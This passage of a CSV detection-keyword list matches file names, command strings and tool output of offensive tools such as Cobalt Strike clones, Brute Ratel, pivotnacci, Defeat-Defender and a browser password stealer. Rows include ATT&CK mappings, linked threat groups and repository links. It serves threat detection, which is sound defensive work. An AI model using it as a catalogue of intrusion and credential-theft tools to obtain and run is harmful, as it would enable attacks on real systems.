BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","54889"
"*'PipeName'>\NamedPipeMaster*",".{0,1000}\'PipeName\'\>\\NamedPipeMaster.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze  monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","#namedpipe","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","54890"
"*PipeViewer.csproj*",".{0,1000}PipeViewer\.csproj.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","N/A","5","7","620","55","2024-11-15T09:55:35Z","2022-12-22T12:35:34Z","54891"
"*PipeViewer_v1.1.zip*",".{0,1000}PipeViewer_v1\.1\.zip.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","N/A","5","7","620","55","2024-11-15T09:55:35Z","2022-12-22T12:35:34Z","54892"
"*PipeViewer-main*",".{0,1000}PipeViewer\-main.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","N/A","5","7","620","55","2024-11-15T09:55:35Z","2022-12-22T12:35:34Z","54893"
"*pipx install fee",".{0,1000}pipx\sinstall\sfee","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","0","#linux","N/A","8","5","491","49","2024-06-28T15:23:21Z","2020-01-06T12:19:34Z","54894"
"*pipx install graphspy*",".{0,1000}pipx\sinstall\sgraphspy.{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1078.004 - T1110.003 - T1071.001 - T1566.002 - T1656","TA0001 - TA0006 - TA0003 - TA0005 - TA0008","N/A","N/A","Collection","https://github.com/RedByte1337/GraphSpy","1","0","N/A","N/A","10","7","680","72","2025-04-15T21:07:15Z","2024-02-07T19:47:15Z","54895"
"*pipx upgrade autorecon*",".{0,1000}pipx\supgrade\sautorecon.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","54896"
"*pipx upgrade graphspy*",".{0,1000}pipx\supgrade\sgraphspy.{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1078.004 - T1110.003 - T1071.001 - T1566.002 - T1656","TA0001 - TA0006 - TA0003 - TA0005 - TA0008","N/A","N/A","Collection","https://github.com/RedByte1337/GraphSpy","1","0","N/A","N/A","10","7","680","72","2025-04-15T21:07:15Z","2024-02-07T19:47:15Z","54897"
"*Pirate-Devs/Kematian*",".{0,1000}Pirate\-Devs\/Kematian.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github.com/Pirate-Devs/Kematian","1","1","N/A","N/A","10","","N/A","","","","54898"
"*Pitty Tiger RAT*",".{0,1000}Pitty\sTiger\sRAT.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","0","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","54899"
"*pivot_smb \*",".{0,1000}pivot_smb\s\\.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","54900"
"*pivot_winrm *",".{0,1000}pivot_winrm\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","54901"
"*pivotnacci  http*",".{0,1000}pivotnacci\s\shttp.{0,1000}","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","Sandworm","C2","https://github.com/blackarrowsec/pivotnacci","1","0","N/A","N/A","9","10","697","114","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z","54902"
"*pivotnacci -*",".{0,1000}pivotnacci\s\-.{0,1000}","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","Sandworm","C2","https://github.com/blackarrowsec/pivotnacci","1","0","N/A","N/A","9","10","697","114","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z","54903"
"*pivotnacci *--polling-interval*",".{0,1000}pivotnacci\s.{0,1000}\-\-polling\-interval.{0,1000}","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","Sandworm","C2","https://github.com/blackarrowsec/pivotnacci","1","0","N/A","N/A","9","10","697","114","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z","54904"
"*pivotnacci/0.0.1*",".{0,1000}pivotnacci\/0\.0\.1.{0,1000}","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","Sandworm","C2","https://github.com/blackarrowsec/pivotnacci","1","1","#useragent","user-agent","9","10","697","114","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z","54905"
"*pivotnaccilib*socks*",".{0,1000}pivotnaccilib.{0,1000}socks.{0,1000}","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","Sandworm","C2","https://github.com/blackarrowsec/pivotnacci","1","0","N/A","N/A","9","10","697","114","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z","54906"
"*pivotnacci-master*",".{0,1000}pivotnacci\-master.{0,1000}","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","Sandworm","C2","https://github.com/blackarrowsec/pivotnacci","1","1","N/A","N/A","9","10","697","114","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z","54907"
"*pivots/named-pipe_windows.go*",".{0,1000}pivots\/named\-pipe_windows\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","54908"
"*pixiewps -e*",".{0,1000}pixiewps\s\-e.{0,1000}","offensive_tool_keyword","RouterScan","a penetration testing tool to maliciously scan for and brute force routers - cameras and network-attached storage devices with web interfaces","T1110","TA0006 - TA0007","RouterScan","Conti","Credential Access","https://github.com/mustafashykh/router-scan","1","0","N/A","N/A","8","1","83","44","2019-02-24T14:31:16Z","2019-02-24T07:52:22Z","54909"
"*-pk8gege.org*",".{0,1000}\-pk8gege\.org.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/AlphabugX/csOnvps","1","0","N/A","N/A","10","10","286","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z","54910"
"*pkexec64.tar.gz*",".{0,1000}pkexec64\.tar\.gz.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","N/A","10","10","286","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z","54911"
"*pkgs.org/download/chntpw*",".{0,1000}pkgs\.org\/download\/chntpw.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","54915"
"*PKINITtools.git*",".{0,1000}PKINITtools\.git.{0,1000}","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550.003 - T1557.002 - T1552.004 - T1212 - T1550","TA0009 - TA0008","N/A","N/A","Lateral Movement","https://github.com/dirkjanm/PKINITtools","1","1","N/A","N/A","N/A","8","737","82","2025-01-03T14:25:52Z","2021-07-27T19:06:09Z","54920"
"*pkt_comm/word_gen.*",".{0,1000}pkt_comm\/word_gen\..{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","54921"
"*pkt_comm/word_list*",".{0,1000}pkt_comm\/word_list.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","54922"
"*plackyhacker/CmdLineSpoofer*",".{0,1000}plackyhacker\/CmdLineSpoofer.{0,1000}","offensive_tool_keyword","CmdLineSpoofer","How to spoof the command line when spawning a new process from C#","T1055 - T1027 - T1036","TA0002 - TA0004 - TA0010","N/A","N/A","Defense Evasion","https://github.com/plackyhacker/CmdLineSpoofer","1","1","N/A","N/A","9","2","106","17","2021-12-28T18:56:25Z","2021-12-27T09:23:45Z","54924"
"*playbit@exploit.im*",".{0,1000}playbit\@exploit\.im.{0,1000}","offensive_tool_keyword","EternalBlack","EternalRomance exploit implemented by Playbit EternalBlack often used by ransomware group like Dispossessor","T1210 - T1489 - T1105 - T1486","TA0001 - TA0002 - TA0009 - TA0040","EternalBlack","Dispossessor ","Exploitation tool","https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/","1","0","#email","N/A","10","10","N/A","N/A","N/A","N/A","54925"
"*Plazmaz/LNKUp*",".{0,1000}Plazmaz\/LNKUp.{0,1000}","offensive_tool_keyword","LNKUp","Generates malicious LNK file payloads for data exfiltration","T1023.003 - T1048 - T1041 - T1204","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Plazmaz/LNKUp","1","1","N/A","N/A","10","4","384","54","2017-08-21T22:58:13Z","2017-08-09T16:18:07Z","54926"
"*Please be sure impacket and ldapsearch are installed and your /etc/krb5.conf file is clean*",".{0,1000}Please\sbe\ssure\simpacket\sand\sldapsearch\sare\sinstalled\sand\syour\s\/etc\/krb5\.conf\sfile\sis\sclean.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","LDAP Password Hunter is a tool which wraps features of getTGT.py (Impacket) and ldapsearch in order to look up for password stored in LDAP database","T1558.003 - T1003.003 - T1078.003 - T1212","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","#linux","N/A","10","2","198","25","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z","54927"
"*Please be sure impacket and ldapsearch are installed and your /etc/krb5.conf*",".{0,1000}Please\sbe\ssure\simpacket\sand\sldapsearch\sare\sinstalled\sand\syour\s\/etc\/krb5\.conf.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","#linux","N/A","7","2","198","25","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z","54928"
"*Please be sure impacket is installed in your system*",".{0,1000}Please\sbe\ssure\simpacket\sis\sinstalled\sin\syour\ssystem.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","LDAP Password Hunter is a tool which wraps features of getTGT.py (Impacket) and ldapsearch in order to look up for password stored in LDAP database","T1558.003 - T1003.003 - T1078.003 - T1212","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","N/A","10","2","198","25","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z","54929"
"*Please be sure impacket is installed in your system*",".{0,1000}Please\sbe\ssure\simpacket\sis\sinstalled\sin\syour\ssystem.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","N/A","7","2","198","25","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z","54930"
"*Please Dont upload sample anywhere*Its been fifth time i am again making this script fud*",".{0,1000}Please\sDont\supload\ssample\sanywhere.{0,1000}Its\sbeen\sfifth\stime\si\sam\sagain\smaking\sthis\sscript\sfud.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection  - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","54931"
"*Please select command [PASSWORDS/HISTORY/COOKIES/AUTOFILL/CREDIT_CARDS/BOOKMARKS]*",".{0,1000}Please\sselect\scommand\s\[PASSWORDS\/HISTORY\/COOKIES\/AUTOFILL\/CREDIT_CARDS\/BOOKMARKS\].{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","0","N/A","N/A","10","9","818","205","2025-01-12T15:11:50Z","2020-03-01T06:50:15Z","54932"
"*'Please Turn off your Windows Defender'*",".{0,1000}\'Please\sTurn\soff\syour\sWindows\sDefender\'.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection  - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","54933"
"*Please use the -Password option to specify a unique password to spray*",".{0,1000}Please\suse\sthe\s\-Password\soption\sto\sspecify\sa\sunique\spassword\sto\sspray.{0,1000}","offensive_tool_keyword","Invoke-CleverSpray","Password Spraying Script detecting current and previous passwords of Active Directory User","T1110.003 - T1110.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/wavestone-cdt/Invoke-CleverSpray","1","0","N/A","N/A","10","1","65","11","2021-09-09T07:35:32Z","2018-11-29T10:05:25Z","54934"
"*Please use the -User option to specify a unique username to spray*",".{0,1000}Please\suse\sthe\s\-User\soption\sto\sspecify\sa\sunique\susername\sto\sspray.{0,1000}","offensive_tool_keyword","Invoke-CleverSpray","Password Spraying Script detecting current and previous passwords of Active Directory User","T1110.003 - T1110.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/wavestone-cdt/Invoke-CleverSpray","1","0","N/A","N/A","10","1","65","11","2021-09-09T07:35:32Z","2018-11-29T10:05:25Z","54935"
"*plex_unpickle_dict_rce.*",".{0,1000}plex_unpickle_dict_rce\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","54937"
"*plug_getpass_nps.dll*",".{0,1000}plug_getpass_nps\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","N/A","10","10","818","150","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z","54940"
"*plug_katz_nps.exe*",".{0,1000}plug_katz_nps\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","N/A","10","10","818","150","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z","54941"
"*plug_qvte_nps.exe*",".{0,1000}plug_qvte_nps\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - 